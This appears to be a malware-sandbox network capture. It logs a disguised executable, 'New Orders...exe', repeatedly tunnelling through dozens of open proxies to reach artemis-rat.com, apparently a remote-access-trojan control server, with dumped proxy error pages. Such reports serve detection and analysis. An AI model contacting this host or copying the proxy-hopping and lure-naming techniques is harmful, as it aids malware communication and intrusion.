                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1697192.168.2.954989104.21.194.19807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.513022900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.668349028 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1698192.168.2.95489567.43.227.228150797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.517693996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1699192.168.2.954990162.159.242.230807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.521708965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.683027029 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1700192.168.2.95491572.10.160.9043377672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.523102045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1701192.168.2.95503343.153.174.44437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.527764082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1702192.168.2.955034140.84.176.2464437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.530716896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1703192.168.2.954370114.129.2.8280817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.536228895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.801263094 CET72INHTTP/1.1 200 Connection established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1704192.168.2.954742117.160.250.16399997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.588241100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.632880926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.181221008 CET221INHTTP/1.1 403 Access Denied
                                                                                        Date: Mon, 11 Mar 2024 15:16:49 GMT
                                                                                        Connection: close
                                                                                        Cache-Control: no-store
                                                                                        Content-Type: text/html
                                                                                        Content-Language: en
                                                                                        Content-Length: 43
                                                                                        Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                        Data Ascii: You are not allowed to access the document.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1705192.168.2.95485591.189.177.19031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.589821100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.912261009 CET1286INHTTP/1.1 403 Forbidden
                                                                                        Server: squid/5.7
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 3628
                                                                                        X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        X-Cache: MISS from lb1
                                                                                        X-Cache-Lookup: NONE from lb1:3128
                                                                                        Via: 1.1 lb1 (squid/5.7)
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1706192.168.2.953312103.149.194.222326507672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.598745108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.646946907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.723261118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.042490005 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1707192.168.2.950564192.163.200.82390957672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.598948002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.773168087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.773504972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1708192.168.2.95034692.204.134.38425717672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.599097967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.646954060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.723265886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1709192.168.2.954815117.160.250.163817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.619219065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.664035082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.246337891 CET221INHTTP/1.1 403 Access Denied
                                                                                        Date: Mon, 11 Mar 2024 15:16:49 GMT
                                                                                        Connection: close
                                                                                        Cache-Control: no-store
                                                                                        Content-Type: text/html
                                                                                        Content-Language: en
                                                                                        Content-Length: 43
                                                                                        Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                        Data Ascii: You are not allowed to access the document.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1710192.168.2.954363184.185.2.1241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.671533108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1711192.168.2.953503146.19.106.194123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.744818926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1712192.168.2.950338190.97.238.889997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.796770096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.411919117 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1713192.168.2.95029451.68.164.77328247672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.799125910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.976264000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.070449114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:00.165632010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:12.273092985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:24.273164034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1714192.168.2.954889138.36.150.2610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.800165892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1715192.168.2.954903177.38.5.1641537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.808126926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1716192.168.2.954900190.103.177.131807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.809257984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
